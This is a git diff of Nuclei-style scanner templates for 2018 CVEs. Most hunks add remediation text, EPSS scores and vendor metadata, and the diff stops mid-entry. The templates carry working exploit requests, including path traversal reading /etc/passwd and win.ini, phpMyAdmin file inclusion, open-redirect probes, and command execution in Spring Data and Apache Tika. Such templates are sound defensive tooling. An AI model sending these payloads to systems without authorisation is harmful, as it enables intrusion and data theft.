method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 490a00463044022050214e77cfa10aeacf1eddf34d690076c0e99daa0c7a4591aa3c7c61d1cd36bf0220196f203c63d04825fae599188665311e80aa92a581dab66a1a31046477d7822b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 821163cf40..6f78f1021a 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. + remediation: | + Upgrade to a patched version of Seagate NAS OS. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 @@ -13,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 - tags: cve,cve2018,seagate,nasos,disclosure,unauth + epss-score: 0.01545 + epss-percentile: 0.85703 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seagate + product: nas_os + tags: cve,cve2018,seagate,nasos,disclosure,unauth http: - raw: @@ -34,9 +41,9 @@ http: extractors: - type: regex - part: body group: 1 regex: - '"version": "([0-9.]+)"' + part: body -# Enhanced by mp on 2022/07/05 +# digest: 4a0a00473045022100ed80bf3b6b6668d11bc2dfd22a08ecdcdf40b92e753a8473790cb1904f9e2fe202201d987db06c230c44161e27262463efaca4ce0236f08a4f8f9cfdf6fb19bb4354:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 7c93e7026e..bd66f40af2 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + remediation: | + Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 @@ -13,13 +15,17 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12300 cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos + epss-score: 0.00118 + epss-percentile: 0.45607 + cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seagate + product: nas_os + tags: cve,cve2018,redirect,seagate,nasos http: - method: GET - path: - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' @@ -29,4 +35,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 +# digest: 490a004630440220053f38284e4068ff0f60ceffc3a5c7ce7da4e44d1ed28f9e8eaae0447c5935b00220481c43229e9808afb945d0aa563be355e51453d847c419d44a318e3ffd80759d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index e069d71059..af10b62ad2 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -5,22 +5,27 @@ info: author: pikpikcu severity: high description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + remediation: | + Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - https://www.phpmyadmin.net/security/PMASA-2018-4/ - https://www.exploit-db.com/exploits/44928/ - - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12613 + - https://security.gentoo.org/glsa/201904-16 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 + epss-score: 0.97455 + epss-percentile: 0.99945 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - epss-score: 0.97516 - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi metadata: max-request: 1 + vendor: phpmyadmin + product: phpmyadmin + tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi http: - method: GET @@ -29,14 +34,13 @@ http: matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022100c333dd2282ba93e5abe706a83d66363538d9311ad53f667a2baaa34536855d0b02206f18cc9fad140cb8a793bcbb702592eff2313ec242c485d045640b5629ea6edd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 1d35ec11eb..a82afe333c 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -5,40 +5,49 @@ info: author: geeknik severity: critical description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. + remediation: | + Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability. reference: - https://circontrol.com/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 - https://www.seebug.org/vuldb/ssvid-97353 - https://www.exploit-db.com/exploits/45384/ + - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 + epss-score: 0.95864 + epss-percentile: 0.99258 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* - epss-score: 0.96925 - tags: cve,cve2018,scada,circontrol,circarlife,logs,edb metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: cve,cve2018,scada,circontrol,circarlife,logs,edb http: - method: GET path: - "{{BaseURL}}/html/log" + matchers-condition: and matchers: - type: word part: header words: - "CirCarLife Scada" + - type: word words: - "user.debug" - "user.info" - "EVSE" condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 490a0046304402203f99a3f70b4ef6ec4dc3bd024aac2091c7ac638a2cbd669f1b397f64c8379cb702206ba49392e8d74af8fbf163013a92564ca178e860c094176ca456a3d99eb46721:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 21456e18ad..a00050845e 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 @@ -16,9 +18,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.45607 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: sv3c + product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot http: @@ -32,4 +39,4 @@ http: words: - '' -# Enhanced by md on 2022/10/13 +# digest: 490a0046304402202cda68af8bffdaafab33393bf133fb44d2e98ea3d13dfc87931cccf460217cd102207bd185c09c7fca25fa6b6395de08f3d5ba54307d827ea99a82ef8a96d6189121:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 1bf600dd84..0acef850ac 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -5,34 +5,42 @@ info: author: hetroublemakr severity: medium description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + remediation: | + Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability. reference: - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - https://access.redhat.com/errata/RHSA-2018:1320 - https://nvd.nist.gov/vuln/detail/CVE-2018-1271 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - epss-score: 0.01676 - tags: cve,cve2018,spring,lfi,traversal + epss-score: 0.01096 + epss-percentile: 0.82815 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: vmware + product: spring_framework + tags: cve,cve2018,spring,lfi,traversal http: - method: GET path: - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' + - type: status status: - 200 -# Enhanced by mp on 2022/07/22 +# digest: 4b0a00483046022100dd5ad0b35b2592fa3f520f20913b56377403fdcf8e1d8016391c462a54ab48c60221008ec773b946aacc0311435373352872c071a2328ead1f62864bce0b1347042045:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 138e3dbd91..5949793a38 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -11,17 +11,25 @@ info: An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + remediation: | + Apply the latest security patches provided by the vendor to fix the deserialization vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - https://pivotal.io/security/cve-2018-1273 - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E + - https://www.oracle.com/security-alerts/cpujul2022.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1273 - cwe-id: CWE-20 + cwe-id: CWE-20,CWE-94 + epss-score: 0.97498 + epss-percentile: 0.99973 + cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: pivotal_software + product: spring_data_commons tags: cve,cve2018,vmware,rce,spring,kev http: @@ -32,17 +40,18 @@ http: Connection: close Content-Type: application/x-www-form-urlencoded - name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]=nuclei + name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}} payloads: command: - "cat /etc/passwd" - "type C:\\/Windows\\/win.ini" - matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - condition: or \ No newline at end of file + condition: or + +# digest: 4a0a0047304502204e22ef014d597948ac346ecc5c42b617151f6814e3ee590439f70737a2a556d0022100cff74b96b1b64ddd1ceb37759186ca331d16d9d17f9ccd8115f78a8b43c4e6cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml new file mode 100644 index 0000000000..318c17a32b --- /dev/null +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -0,0 +1,49 @@ +id: CVE-2018-12909 + +info: + name: Webgrind <= 1.5 - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI + remediation: | + Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md + - https://github.com/jokkedk/webgrind/issues/112 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12909 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-12909 + cwe-id: CWE-22 + epss-score: 0.01119 + epss-percentile: 0.8299 + cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: webgrind_project + product: webgrind + fofa-query: app="Webgrind" + tags: cve,cve2018,lfi,webgrind + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - 'webgrind' + condition: and + + - type: status + status: + - 200 + +# digest: 490a004630440220058b00aab65fba1ac70f2643e25afb4d8feb9168cad11659c926f5a96886a98402204ece3e656d80f2a4b271347e48a6c8bd073c51376c862d5481e84438af3aec1a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index d4fcd63b8d..47461db53d 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + remediation: | + Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability. reference: - https://github.com/unh3x/just4cve/issues/10 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html @@ -14,10 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 - epss-score: 0.97193 - tags: cve,cve2018,zoho,xss,manageengine,packetstorm + epss-score: 0.97052 + epss-percentile: 0.99675 + cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: firewall_analyzer + tags: cve,cve2018,zoho,xss,manageengine,packetstorm http: - method: GET @@ -26,19 +32,18 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/18 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c7412a33cc840c2155ef6811e08fe8968119e8a9d19abff2c2913cca7560745b0221009d55b28978ca11f2360afab90d8009f887f1957b7a13acf2607d3c9778b591b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index b33f9f2ed6..7e76603d53 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -5,50 +5,56 @@ info: author: pikpikcu severity: high description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. + remediation: Upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E - - http://web.archive.org/web/20210516175956/https://www.securityfocus.com/bid/104001 - https://nvd.nist.gov/vuln/detail/CVE-2018-1335 - remediation: Upgrade to Tika 1.18. + - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - tags: edb,cve,cve2018,apache,tika,rce + epss-score: 0.9738 + epss-percentile: 0.99881 + cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: tika + tags: packetstorm,edb,cve,cve2018,apache,tika,rce,intrusive http: - method: PUT path: - "{{BaseURL}}/meta" + + body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec("cmd /c whoami"); + headers: X-Tika-OCRTesseractPath: cscript X-Tika-OCRLanguage: //E:Jscript Expect: 100-continue Content-type: image/jp2 Connection: close - body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" matchers-condition: and matchers: - - type: word + part: header words: - "Content-Type: text/csv" - part: header - type: word - words: - - "org.apache.tika.parser.DefaultParser" - - "org.apache.tika.parser.gdal.GDALParse" part: body + words: + - org.apache.tika.parser.DefaultParser + - org.apache.tika.parser.gdal.GDALParse condition: and - type: status status: - 200 -# Enhanced by mp on 2022/07/07 +# digest: 490a0046304402206a158b8d0a7c8c7d9878383cc25c308ddfd5a9cbb2fc1f8135b630e56529a1200220632bb1422abee265f30bf73c6e1cb2edd7ee934df31c884ff0b53bd938e33749:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 6386830369..009aaedd67 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). + remediation: | + Apply the necessary patches or updates provided by Fortinet to fix the vulnerability. reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 @@ -14,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-13379 cwe-id: CWE-22 + epss-score: 0.97395 + epss-percentile: 0.99891 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - epss-score: 0.975 metadata: - max-request: 1 verified: true + max-request: 1 + vendor: fortinet + product: fortios shodan-query: http.html:"/remote/login" "xxxxxxxx" tags: cve,cve2018,fortios,lfi,kev @@ -32,4 +37,5 @@ http: part: body regex: - '^var fgt_lang =' -# Enhanced by mp on 2022/05/12 + +# digest: 4a0a00473045022100f1e46f14c962c39c49d5f8bd28ce9321f3e9f219c1e8cf5f698584edb80b87b8022005cf23dcd5f8f4f2a10f274723853ad46fe2aad71b683068c727e5c943301e1b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index f28103f0a0..9524448e84 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -5,6 +5,8 @@ info: author: shelld3v,AaronChen0 severity: medium description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters. + remediation: | + Apply the latest security patches or updates provided by Fortinet to fix this vulnerability. reference: - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html - https://fortiguard.com/advisory/FG-IR-18-383 @@ -16,9 +18,13 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - tags: cve,cve2018,fortios,xss,fortinet + epss-percentile: 0.46234 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: fortinet + product: fortios + tags: cve,cve2018,fortios,xss,fortinet http: - method: GET @@ -37,12 +43,12 @@ http: - type: word part: header + negative: true words: - "application/json" - negative: true - type: status status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4a0a00473045022100d1bd11336a1762fce6baca7515fe137852099fa743d6c1da7af16a20900db8280220252525918b939bd2322eec3c697c83e5cd82c3571138a720d92c53d04e3ca445:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index ab551cbdbe..6e4d46c5a0 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: medium description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + remediation: | + Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/45016 - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ @@ -15,11 +17,14 @@ info: cvss-score: 5.5 cve-id: CVE-2018-13980 cwe-id: CWE-22 + epss-score: 0.0018 + epss-percentile: 0.55009 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* - epss-score: 0.00089 - tags: cve,cve2018,lfi,edb,packetstorm metadata: max-request: 1 + vendor: zeta-producer + product: zeta_producer + tags: cve,cve2018,lfi,edb,packetstorm http: - method: GET @@ -28,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -37,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 +# digest: 4b0a00483046022100e5239f1524174ed7d36fc5096cb2da666034fc06a7252ac42372abdbcaa1c45a022100f2bb91edcfe776cc5760a37d0f88d2f6890c54741e533b2c9eb68a7853d73ff9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 7e2cce6553..19958cd605 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients. + remediation: | + Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability. reference: - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - https://bugzilla.zimbra.com/show_bug.cgi?id=109018 @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - tags: cve,cve2018,xss,zimbra + epss-score: 0.00512 + epss-percentile: 0.7398 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + tags: cve,cve2018,xss,zimbra http: - method: GET @@ -27,17 +34,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/18 + - type: status + status: + - 200 + +# digest: 4a0a00473045022064dbdee099e274a4ba82e4ba19cb6b2adca4240b5e3bfc47e4edb0a0cfe8702f02210096769d84b5012800f30aaa3f656394141af1ae1aff89792deb22f7a3aaa910a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index a116a2f0a3..5b389e2a17 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 @@ -14,9 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - tags: edb,cve,cve2018,lfi,camera,iot + epss-score: 0.24472 + epss-percentile: 0.96085 + cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: velotismart_project + product: velotismart_wifi_firmware + tags: edb,cve,cve2018,lfi,camera,iot http: - method: GET @@ -25,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -34,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 490a004630440220385992d4ac63411dead9584c7af43ea137d37f0a6756b7b800a272e6e7ef2f490220466aab46360772e430915beb84ff8da0ed2f027c3ab99946e3cc4bd1281fd3bd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 0ac214323c..f9bf76afe3 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability. reference: - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa - https://seclists.org/fulldisclosure/2019/Jan/32 @@ -16,9 +18,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - tags: cve2018,redirect,orangeforum,oss,seclists,cve + epss-score: 0.00068 + epss-percentile: 0.28418 + cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: goodoldweb + product: orange_forum + tags: cve2018,redirect,orangeforum,oss,seclists,cve http: - method: GET @@ -33,4 +40,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 +# digest: 4b0a00483046022100b054595468b24e432482d7729c9285375c74f77ab29ae6176ed824b4e03f183c022100b22ac0d8a204ec99b7694f047df60f145e9feff3ec9badc5efff90ce9000c1ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index dd98158430..5de05278d5 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -5,12 +5,13 @@ info: author: pikpikcu severity: medium description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, 